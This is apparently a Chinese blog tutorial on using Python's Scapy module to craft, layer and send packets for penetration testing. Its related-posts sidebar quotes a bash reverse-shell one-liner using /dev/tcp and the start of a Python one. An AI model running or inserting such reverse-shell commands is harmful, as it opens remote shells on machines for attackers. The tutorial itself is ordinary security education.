Python渗透测试之Scapy模块&情报收集

已于 2022-04-25 21:42:31 修改
阅读量4k 收藏 23
点赞数 1
文章标签: python 学习 web安全
于 2022-04-25 19:59:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/waqqy/article/details/124408489
版权

文章目录

Scapy模块文件

关于Scapy

  • Scapy是一个由Python语言编写的强大工具,它是大量程序编写人员最喜爱的一个网络模块。
  • 也可以在自己的程序中使用这个模块来实现对网络数据包的发送、监听和解析。
  • 这个模块相比起Nmap来说,更为底层。可以更为直观地了解到网络中的各种扫描和攻击行为,例如,要检测某一个端口是否开放,只需提供给Nmap一个端口号,而Nmap就会给出一个开放或者关闭的结果,但是并不知道Nmap是怎么做的。
  • 如果想对网络中的各种问题进行深入研究,Scapy无疑是一个更好的选择,可以利用它来产生各种类型的数据包并发送出去,Scapy也只会把收到的数据包展示给你,而并不会试图解释收到的数据包,解释结果可以帮助那些不知道什么是端口扫描的用户,但是弊大于利,因为这对于结果是一种主观的解释。可能的结果就是它们可以自己解释,知识丰富的用户将试图反向还原这个工具的解释以得到引起这个解释的真正原因。不幸的是,在这个过程中有大量的信息丢失。

在这里插入图片描述

基本用法

  • Scapy提供了和Python一样的交互式命令行。Scapy可以作为Python的一个模块存在,但是Scapy本身就是一个可以运行的工具,它自己具备一个独立的运行环境,因而可以不在Python环境下运行。
  • 在Kali Linux 中已经集成了Scapy,既可以在Python环境中使用Scapy,也可以直接使用它。启动一个终端,输入命令“scapy”,就可以启动Scapy环境,如图
    在这里插入图片描述
  • 在Scapy中,每一个协议就是一个类。
  • 只需要实例化一个协议类,就可以创建一个该协议的数据包。
  • 例如,如果要创建一个IP类型的数据包,就可以使用如下命令ip = IP()
    在这里插入图片描述
  • IP数据包最重要的属性就是源地址和目的地址,这两个属性可以使用src和dst来设置。例如,要构造一个发往“192.168.1.101”的IP数据包,可以使用ip = IP(dst="192.168.1.101")语句。
    在这里插入图片描述
  • 这个目标dst的值可以是一个IP地址,也可以是一个IP范围,例如192.168.1.0/24,这时产生的就不是1个数据包,而是256个数据包。
    在这里插入图片描述
  • 如果要查看其中每一个数据包,可以使用 [p for p in ip]
    在这里插入图片描述

采用分层形式来构造数据包

  • 通常最下面的一个协议为Ether,然后是IP,再之后是TCP或者是UDP。

  • IP()函数无法用来构造ARP请求和应答数据包,可以使用Ether(),

  • 这个函数可以设置发送方和接收方的MAC地址。产生一个广播数据包,执行命令如下

    Ether(dst="ff:ff:ff:ff:ff:ff")

    在这里插入图片描述

  • Scapy中的分层通过符号“/”实现,一个数据包是由多层协议组合而成,这些协议之间就可以使用“/”分开,按照协议由底而上的顺序从左向右排列

  • 例如,可以使用以下命令来完成一个TCP数据包,

    Ether()/IP()/TCP()

    在这里插入图片描述

  • 如果构造一个HTTP数据包,可以使用以下方式

    IP()/TCP()/"GET / HTTP/1.0\r\n\r\n"

    在这里插入图片描述

  • ls()函数查看一个类所拥有的属性

    • 使用ls(Ether())来查看Ether类属性
      在这里插入图片描述
    • 使用ls(IP())来查看IP类的属性
      在这里插入图片描述

  • 可以对这里面的属性进行设置,例如:将ttl的值设置为32,可以使用如下方式

    IP(src="192.168.1.1", dst="192.168.1.101", ttl=32)

    在这里插入图片描述

Scapy模块中的函数

send()和sendp()

send() 工作在第三层,发送IP数据包
sendp() 工作在第二层,发送Ether数据包

例如,构造一个目的地址为"192.168.1.101"的ICMP数据包,并将其发送出去,可以使用语句

send(IP(dst="192.168.1.101")/ICMP())
#注意,如果这个数据包发送成功,下方会有一个“Sent 1 packets.”的显示。

在这里插入图片描述

sendp(Ether(dst="ff:ff:ff:ff:ff:ff"))

在这里插入图片描述
注:这两个函数的特点是只发不收,只会将数据包发送出去,但是没有能力处理该数据包的回应包!!

fuzz()函数

如果希望发送一个内容是随机填充的数据包,而且又要保证这个数据包的正确性,那么可以是fuzz()函数。
例如,可以使用如下命令来创建一个发往192.168.1.101的TCP数据包。

IP(dst="192.168.1.101")/fuzz(TCP())

最低0.47元/天 解锁文章
Magiskpig
关注
  • 1
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Scapy模块
weixin_50348916的博客
04-04 669
一、简介 ✦可以使用这个模块来实现对网络数据包的发送、监听和解析 ✦这个模块相比起Nmap来说,更为底层。可以更为直观地了解到网络中的各种扫描和攻击行为。 ✦可以利用它来产生各种类型的数据包并发送出去,Scapy也只会把收到的数据包展示给你 二、基本用法 ①在kali中启动一个终端,输入命令"scapy",就可以启动scapy环境 ②在Scapy中,每一个...
Python渗透测试——一、数据包的编辑工具——Scapy
热门推荐
钟言的博客
12-09 1万+
本篇为Python渗透测试的第一篇,数据包的编辑工具,Scapy,详细内容包含了:Scapy简介 Scapy中的分层结构Scapy中的常用函数四、在Scapy 中发送和接收数据包五、Scapy 中的抓包函数等等
Pythonscapy模块学习笔记
qq_44657899的博客
04-18 4861
文章目录0x00 scapy安装以及环境配置0x01 实验10x02 实验20x03 实验30x04 实验40x04 实验5 0x00 scapy安装以及环境配置 学习自知乎大佬 ——弈心——网络工程师的Python之路—Scapy基础篇 复现了一波 scapy安装: pip install scapy 导入scapy方式: from scapy.all import * 然后是环境配置 kali的IP地址为192.168.43.245,使用的网卡为eth0 物理机的IP地址为192.168.43.1
python脚本(渗透测试)_渗透测试常用python脚本有哪些(1)
最新发布
2401_84972607的博客
05-13 739
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Scapy技术笔记(一)
qq_63565161的博客
03-31 334
scapy技术笔记
Scapy常用操作和命令(2)
Han的小站
01-22 3439
 send方法用来在3层发送报文 >>> send(IP(dst="1.2.3.4")/ICMP()) . Sent 1 packets. 使用loop参数循环发送(Ctrl+C终止),inter表示发送时间间隔 >>> send(IP()/ICMP(),loop=1,inter=0.5) ......^C Sent
scapy发送pcap包
qq_39306128的博客
02-21 1694
# -*- coding: utf-8 -*- #!/usr/bin/python import sys import os import re from scapy.all import * req_dir = 'req' resp_dir = 'resp' src_mac = 'C4:00:AD:2D:46:98' dst_mac = '00:0c:29:5e:2a:c5' req_iface = "eth7" resp_iface = "eth8" class Send: de
#资源分享达人# 《Python渗透测试编程技术 方法与实践》_李华峰.zip
08-03
1. **Python基础**:首先,书中可能会介绍Python的基础语法,包括变量、数据类型、控制结构、函数、模块等,为后续的渗透测试编程打下坚实的基础。 2. **网络协议与扫描技术**:渗透测试中,了解和利用网络协议(如...
python scapy模块
01-03
在安全领域,Scapy常用于渗透测试和漏洞利用。例如,你可以使用Scapy进行DNS欺骗、ARP欺骗,甚至构造复杂的网络攻击,如Teardrop攻击或Smurf攻击。同时,Scapy还可以用于创建蜜罐系统,模拟网络服务来诱捕攻击者。 ...
python&nweb渗透测试工具(django)
11-21
python django mysql 可以构建端口扫描器,侦查漏洞,根据tcp全连接扫描,捕获应用标识等等, 通过scapy获取请求和响应的数据包,分层解析pcap报文, 也可以检测一些web系统是否存在sql注入漏洞,进行任意插入数据
Python项目开发实战_操作系统判断渗透测试_编程案例解析实例详解课程教程.pdf
05-02
ScapyPython 中一个强大的交互式数据包处理程序,它能够伪造或者解码大量的...从 2016 年始,Python 3 对应的 Scapy 模块已更名为 Kamene。本项目利用 Python3 中的 Kamene 模块,利用 TTL 值判断操作系统的类型。
渗透测试常用Python工具全集
03-23
如果你从事漏洞研究、逆向工程或者渗透测试,应该绝对试试Python!   如果你从事漏洞研究、逆向工程或者渗透测试,应该绝对试试Python!   网络   Scapy,Scapy3k:发送、嗅探、解析和伪造网络数据包,可交互使用或作为一个库使用。   pypcap,Pcapy和pylibpcap:一些不同的libpcap的Python绑定   libdnet:底层的网络程序,包括查询网络接口,发送以太网帧   dpkt:快速而简单的包构造和解析器,有基本的TCP/IP协议的定义   Impacket:构造和解码网络数据包。支持高层的协议,比如NMB和SMB   pynids:libnids开
Scapy-Pentest:Scapy 渗透测试脚本
06-03
这个“Scapy-Pentest”项目是针对渗透测试的一个集合,其中包含了使用 Scapy 编写的脚本。 首先,让我们深入了解一下 Scapy 的核心功能。Scapy 允许用户构建自定义的数据包,这些数据包可以包含任意协议层的信息。...
Python程序设计——安全渗透测试的常见模块
bluepangzi的博客
03-29 970
安全渗透测试的常见模块一、Socket 模块1.实例化 Socket 类2.Socket常用的函数—服务端函数bind():listen():accept():3.客户端的函数send():sendall():recv():sendto():recvfrom():4.使用Socket编写一个简单的服务端和客户端二、python-nmap模块1.python-nmap安装过程2.python-nmap模块类的实例化PortScanner类3.python-nmap模块中的函数scan()函数:参数hosts参
python 渗透测试基础-网络通讯
慕容卡卡
03-23 1256
本文转载自【 python 渗透测试基础-网络通讯】https://www.lzfkj.vip/post/20 文章目录python 渗透测试基础-网络通讯简述TCP实例TCP 服务端TCP 客户端运行结果TCP的另外一个客户端TCP的SSL请求客户端UDP实例UDP 服务端UDP 客户端 python 渗透测试基础-网络通讯 简述     在很多情况下,我们所在的测试环境并没有给我们提供很多有利的条件,特别是在一些审计等级高的地方,更是直接断开物理连接;除了这个方式
渗透中反弹shell与端口
千寻的博客
01-03 1812
渗透中反弹shell与端口 bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shell的bash完成,所以某些情况下不支持 python版本: `python-c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_S...
python网络渗透入门_利用Python进行Web渗透测试(四):HTTP协议基础
weixin_39890543的博客
12-10 213
本篇将会涉及:什么是HTTP,以及HTTP的工作方式HTTP的方法一、什么是HTTPHTTP协议HTTP全称超文本传输协议,一个设计用来来客户端和服务器之间进行通信的协议。HTTP在网络世界中属于OSI模型的第七层——应用层,也属于TCP/IP模型的第四层——应用层。关于什么是OSI模型,什么又是TCP/IP模型,简而言之,其是计算机网络世界的一个网络体系结构,用来定义计算机网络及其各个部分通信的...
靶机渗透测试(Mr-Robot: 1)
@小张小张的博客
11-05 1174
靶机渗透测试(Mr-Robot: 1): Vulnhub靶机 Mr-Robot: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(beginner-intermediate.) 目标:This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find 进
Python渗透测试编程技术——漏洞渗透模块
weixin_50341025的博客
03-31 1560
一、测试软件的溢出漏洞 FreeFloat FTP Server会在运行的主机上建立一个FTP,其他计算机上的用户可以登录到这个FTP上来存取文件 例如,在主机192.168.0.116的C盘中运行这个FTP软件,在另外一台计算机中可以使用FTP下载工具或者命令的方式进行访问。这里采用命令的方式对其进行访问,(使用 FreeFloat FTP Server这个服务器对登录没有任何的限制,输入任意的用户名和密码都可以登录进去) 现在来看看这个工具是否存在 栈溢出漏洞。 现在输入用户名的时候,尝试使用一个特
python scapy渗透测试
08-12
- *2* *3* [Python渗透测试Scapy模块&情报收集](https://blog.csdn.net/waqqy/article/details/124408489)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值